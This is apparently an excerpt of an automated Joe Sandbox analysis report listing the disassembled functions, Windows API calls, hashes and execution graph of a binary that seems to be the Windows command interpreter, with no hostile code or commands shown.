                              • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                              • Instruction Fuzzy Hash: D1219F3591DB45C6E740BF06E884369B3A4FB88754F980035DE8D827A8DF7DE498D720
                              Function 00007FF744F14AD0 Relevance: 6.0, APIs: 4, Instructions: 33memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F14AD6
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F14AEF
                                • Part of subcall function 00007FF744F14A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A28
                                • Part of subcall function 00007FF744F14A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A66
                                • Part of subcall function 00007FF744F14A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A7D
                                • Part of subcall function 00007FF744F14A14: memmove.MSVCRT(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14A9A
                                • Part of subcall function 00007FF744F14A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF744F149F1), ref: 00007FF744F14AA2
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F08798), ref: 00007FF744F1EE64
                              • RtlFreeHeap.NTDLL ref: 00007FF744F1EE78
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                              • String ID:
                              • API String ID: 2759988882-0
                              • Opcode ID: 75675db4d9e082b6ee3134e55f7fee0755989425f88a4696f40f247a198a0c52
                              • Instruction ID: a7cd730335a9e1d8cd85dc8112b3214e626cc75a11854ab703b50a76f498d01b
                              • Opcode Fuzzy Hash: 75675db4d9e082b6ee3134e55f7fee0755989425f88a4696f40f247a198a0c52
                              • Instruction Fuzzy Hash: F4F0EC61A1DA42C7EB14BF679495178E9E1EF8EB41B8D9434CD4E42398EE3CA8449720
                              Function 00007FF744F2F22C Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ConsoleMode_get_osfhandle
                              • String ID:
                              • API String ID: 1606018815-0
                              • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                              • Instruction ID: c5d180bd216bad9aeaa30a082b070fd1a3834689181c2c8ec9a601c070538841
                              • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                              • Instruction Fuzzy Hash: DDF0A235529A42CBD744BF11E484179FA60FB8AB42F889274DE4B063D8DF3CD5159B50
                              Function 00007FF744F0E420 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F106C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106D6
                                • Part of subcall function 00007FF744F106C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106F0
                                • Part of subcall function 00007FF744F106C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F1074D
                                • Part of subcall function 00007FF744F106C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F10762
                                • Part of subcall function 00007FF744F0EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF744F0E626,?,?,00000000,00007FF744F11F69), ref: 00007FF744F0F000
                                • Part of subcall function 00007FF744F0EF40: wcschr.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F031
                                • Part of subcall function 00007FF744F0EF40: iswdigit.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F0F0D6
                              • longjmp.MSVCRT ref: 00007FF744F1CCBC
                              • longjmp.MSVCRT(?,?,00000000,00007FF744F11F69,?,?,?,?,?,?,?,00007FF744F0286E,00000000,00000000,00000000,00000000), ref: 00007FF744F1CCE0
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                              • String ID: GeToken: (%x) '%s'
                              • API String ID: 3282654869-1994581435
                              • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                              • Instruction ID: a8cb9d22287c89f482395b60a8b7a6096b4e12283a189693004d956f287001ff
                              • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                              • Instruction Fuzzy Hash: 8661A361A0D682C6FB14BF1394D8279A2A1AF85794FDC4935CE1D476E9EE3CF840A320
                              Function 00007FF744F310D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F0CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDA6
                                • Part of subcall function 00007FF744F0CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF744F0B9A1,?,?,?,?,00007FF744F0D81A), ref: 00007FF744F0CDBD
                              • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF744F2827A), ref: 00007FF744F311DC
                              • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF744F2827A), ref: 00007FF744F31277
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$AllocProcessmemmovewcschr
                              • String ID: &()[]{}^=;!%'+,`~
                              • API String ID: 1135967885-381716982
                              • Opcode ID: bd83934b9501f045900d4cea0c34526f969d72289539c66b600af79ca04ff41e
                              • Instruction ID: bdb10c7fcf60bb9a86ec409df526e6a95f3907fc4b14cf87dcfd671449d6533e
                              • Opcode Fuzzy Hash: bd83934b9501f045900d4cea0c34526f969d72289539c66b600af79ca04ff41e
                              • Instruction Fuzzy Hash: 76719071A0D242C6E760FF17A5C0A79E6A4FB94799F885235CE4D83BD8DE3CE4419B10
                              Function 00007FF744F308EC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memmovewcsncmp
                              • String ID: 0123456789
                              • API String ID: 3879766669-2793719750
                              • Opcode ID: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                              • Instruction ID: 7871da8a5cbb03ad5b02ab7b0e2b0478d6e0a9b6e7a0c6b2c2191c3ae9f9fa78
                              • Opcode Fuzzy Hash: b6d2eb98a78dae28402b6106fc772dbd77ca9a03dc6c88e297d1125e4b884182
                              • Instruction Fuzzy Hash: 4241B522B1D686C6EB25BF27E4406BAA2A4FB44B84F885132DE4D477CDDE3CD4419350
                              Function 00007FF744F29784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F297D0
                                • Part of subcall function 00007FF744F0D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D46E
                                • Part of subcall function 00007FF744F0D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D485
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D4EE
                                • Part of subcall function 00007FF744F0D3F0: iswspace.MSVCRT ref: 00007FF744F0D54D
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D569
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D58C
                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F298D7
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                              • String ID: Software\Classes
                              • API String ID: 2714550308-1656466771
                              • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                              • Instruction ID: 9aad1adb13f797f08c9eb8f9d81cf3b85786b843235d5843a28aa0aa4a7ff230
                              • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                              • Instruction Fuzzy Hash: D5418D22B1D712C2EB00BF17A484479A3A4FB84BD0BD88131DE5D43BE9DE3AE842D750
                              Function 00007FF744F2A0B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F2A0FC
                                • Part of subcall function 00007FF744F0D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D46E
                                • Part of subcall function 00007FF744F0D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF744F0D485
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D4EE
                                • Part of subcall function 00007FF744F0D3F0: iswspace.MSVCRT ref: 00007FF744F0D54D
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D569
                                • Part of subcall function 00007FF744F0D3F0: wcschr.MSVCRT ref: 00007FF744F0D58C
                              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F2A1FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                              • String ID: Software\Classes
                              • API String ID: 2714550308-1656466771
                              • Opcode ID: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                              • Instruction ID: 31fdb2224978eebfab6120d5c0f9a1f8ef0c368123a94d2ffc930aef5cd0261f
                              • Opcode Fuzzy Hash: 8d4a83688f0bdb6c4652951bc114003fef2692198ab2fb548b80d57547a1bced
                              • Instruction Fuzzy Hash: 79419D22A1DB52C1EB00FF16E484439A3A5FB84BE0B988131DE1D537E9DE3AE846D710
                              Function 00007FF744F0CAD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ConsoleTitle
                              • String ID: -
                              • API String ID: 3358957663-3695764949
                              • Opcode ID: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                              • Instruction ID: 567dedb37c6608fa6e958bb3e1a5ad27161864cc832405e11b426251e5b89662
                              • Opcode Fuzzy Hash: 6064907e277deedeb5a502c31a0978855624e0bf0fd413fe06aa3058ee5bb337
                              • Instruction Fuzzy Hash: C6317021A0D682C6EB14BF13A884078E6A4EB89B90F9D5135DE0E077D9EF7CE441E724
                              Function 00007FF744F17280 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsnicmpswscanf
                              • String ID: :EOF
                              • API String ID: 1534968528-551370653
                              • Opcode ID: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                              • Instruction ID: 709e72f1f92fa5520eb781d0d50f0901aa146010d9a7f47e8bddd848ed210a76
                              • Opcode Fuzzy Hash: 0653d2a24574df907a156a73786289bc793a3e356bc39756bce3d9cad3207eea
                              • Instruction Fuzzy Hash: 99314C31A1CA46C6FB54BF57A8802B8F2E0EF55B50FCC5131EE4E462D9DF2CE841A660
                              Function 00007FF744F03BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: _wcsnicmp
                              • String ID: /-Y
                              • API String ID: 1886669725-4274875248
                              • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                              • Instruction ID: 93605b6c2bfee62d3588cc919545b91a83583a6a7154d9e10ea71fe71f54d50c
                              • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                              • Instruction Fuzzy Hash: 73212E65A0C665C1EB10BF479584178B6E0BB85FC0F898431DE49577D8DE3CE4A2E314
                              Function 00007FF744F0B62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID:
                              • String ID: 3$3
                              • API String ID: 0-2538865259
                              • Opcode ID: 20d97ca64ded1831fc5a14ddeeed34ee126ef41525fd7b4cb26341839782f1e3
                              • Instruction ID: b878e8c913dfdab1e5b9da9fad28db2f53291041632704d93e68aa4948094ca9
                              • Opcode Fuzzy Hash: 20d97ca64ded1831fc5a14ddeeed34ee126ef41525fd7b4cb26341839782f1e3
                              • Instruction Fuzzy Hash: CB01F371D5E582CAF314BFA298C8674B660BBA4311FDC5135CE0E015E9DF3C7894A661
                              Function 00007FF744F109F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswspacewcschr
                              • String ID: =,;
                              • API String ID: 287713880-1539845467
                              • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                              • Instruction ID: b70bfb644d747138e3695210821f7e8b1714065a401207b67df10f61a06d8683
                              • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                              • Instruction Fuzzy Hash: E8F03121A1C662C6EB60BF03E480175A5E0BF49F41BCD9132DD5D46ADCDF2CE850A621
                              Function 00007FF744F106C0 Relevance: 5.1, APIs: 4, Instructions: 97memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106D6
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106F0
                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F1074D
                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F10762
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$AllocProcess
                              • String ID:
                              • API String ID: 1617791916-0
                              • Opcode ID: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                              • Instruction ID: 59fb5f7045792851bd5c14d8019b9b2b3f6aff530c963de63aa67d58d01e9bf9
                              • Opcode Fuzzy Hash: cb757f755a027b81a776796b91978963b45d8166734cf522aad66d61178eecf0
                              • Instruction Fuzzy Hash: 8A412772A0D652CAEB15BF12E484579B7B0EB85B90F989035DE4D07BD8DF3CA840E760

                              Execution Graph

                              Execution Coverage:3.9%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:0%
                              Total number of Nodes:872
                              Total number of Limit Nodes:7
                              execution_graph 18928 7ff744f06be0 18929 7ff744f0cd90 166 API calls 18928->18929 18930 7ff744f06c04 18929->18930 18931 7ff744f06c13 _pipe 18930->18931 18933 7ff744f241a2 18930->18933 18939 7ff744f06c32 18931->18939 18966 7ff744f06e26 18931->18966 18932 7ff744f03278 166 API calls 18932->18933 18934 7ff744f03278 166 API calls 18933->18934 18935 7ff744f241bc 18934->18935 18936 7ff744f2e91c 198 API calls 18935->18936 18937 7ff744f241c1 18936->18937 18941 7ff744f03278 166 API calls 18937->18941 18938 7ff744f06df1 18939->18938 18979 7ff744f0affc _dup 18939->18979 18943 7ff744f241d2 18941->18943 18942 7ff744f06c7d 18942->18933 18945 7ff744f0b038 _dup2 18942->18945 18944 7ff744f2e91c 198 API calls 18943->18944 18946 7ff744f241d7 18944->18946 18947 7ff744f06c93 18945->18947 18949 7ff744f03278 166 API calls 18946->18949 18947->18946 18948 7ff744f0d208 _close 18947->18948 18950 7ff744f06ca4 18948->18950 18951 7ff744f241e4 18949->18951 18981 7ff744f0be00 18950->18981 18952 7ff744f2e91c 198 API calls 18951->18952 18954 7ff744f241e9 18952->18954 18956 7ff744f06ccf _get_osfhandle DuplicateHandle 18957 7ff744f06d07 18956->18957 18958 7ff744f0b038 _dup2 18957->18958 18959 7ff744f06d11 18958->18959 18959->18946 18960 7ff744f0d208 _close 18959->18960 18961 7ff744f06d22 18960->18961 18962 7ff744f06e21 18961->18962 18964 7ff744f0affc _dup 18961->18964 18963 7ff744f2e91c 198 API calls 18962->18963 18963->18966 18965 7ff744f06d57 18964->18965 18965->18937 18967 7ff744f0b038 _dup2 18965->18967 18966->18932 18968 7ff744f06d6c 18967->18968 18968->18946 18969 7ff744f0d208 _close 18968->18969 18970 7ff744f06d7c 18969->18970 18971 7ff744f0be00 659 API calls 18970->18971 18972 7ff744f06d9c 18971->18972 18973 7ff744f0b038 _dup2 18972->18973 18974 7ff744f06da8 18973->18974 18974->18946 18975 7ff744f0d208 _close 18974->18975 18976 7ff744f06db9 18975->18976 18976->18962 18977 7ff744f06dc1 18976->18977 18977->18938 19018 7ff744f06e60 18977->19018 18980 7ff744f0b018 18979->18980 18980->18942 18982 7ff744f06cc4 18981->18982 18983 7ff744f0be1b 18981->18983 18982->18956 18982->18957 18983->18982 18984 7ff744f0be47 memset 18983->18984 18985 7ff744f0be67 18983->18985 19068 7ff744f0bff0 18984->19068 18987 7ff744f0be73 18985->18987 18988 7ff744f0bf29 18985->18988 18991 7ff744f0beaf 18985->18991 18989 7ff744f0be92 18987->18989 18994 7ff744f0bf0c 18987->18994 18990 7ff744f0cd90 166 API calls 18988->18990 18998 7ff744f0bea1 18989->18998 19022 7ff744f0c620 GetConsoleTitleW 18989->19022 18993 7ff744f0bf33 18990->18993 18991->18982 18996 7ff744f0bff0 185 API calls 18991->18996 18993->18991 18999 7ff744f0bf9e 18993->18999 19002 7ff744f088a8 _wcsicmp 18993->19002 19106 7ff744f0b0d8 memset 18994->19106 18996->18982 18998->18991 19005 7ff744f0af98 2 API calls 18998->19005 19247 7ff744f071ec 18999->19247 19000 7ff744f0bf1e 19000->18991 19004 7ff744f0bf5a 19002->19004 19003 7ff744f0bfa9 19003->18991 19007 7ff744f0cd90 166 API calls 19003->19007 19004->18999 19006 7ff744f0bf5f 19004->19006 19005->18991 19166 7ff744f10a6c 